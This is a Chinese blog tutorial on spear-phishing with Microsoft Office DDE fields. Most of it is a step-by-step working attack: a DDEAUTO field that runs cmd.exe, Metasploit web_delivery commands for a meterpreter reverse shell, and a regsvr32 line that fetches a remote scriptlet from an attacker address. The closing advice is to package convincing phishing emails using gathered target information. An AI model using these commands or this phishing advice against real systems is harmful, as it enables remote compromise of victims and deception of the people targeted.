鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

DDE

DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。

通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。

在MSWord和MSExcel里,我们可以使用DDE来执行命令。

DDE 攻击演示

首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“域”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码,插入下面的内容:
在这里插入图片描述
然后再里面输入测试代码:

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

在这里插入图片描述

##保存后重新打开 word 文档:
在这里插入图片描述

在这里插入图片描述

##点击两次“是”就会调用 DDE 执行 calc.ex:

在这里插入图片描述

Metasploit + DDE = Meterpreter

那如果是要反弹 shell 的话需要借助 MSF 来帮助我们:

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_uuid 
msf > set lhost 192.168.201.237
msf > set lport 8081
msf > exploit -j 
[*] Exploit running as background job 0.

在这里插入图片描述

regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码(注意引号):

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

在这里插入图片描述
最后保存再打开 word 文档即可反弹 shell 到 msf :
在这里插入图片描述

结尾

DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件,和如何实施了,一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实,在此不多解释大家都懂。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值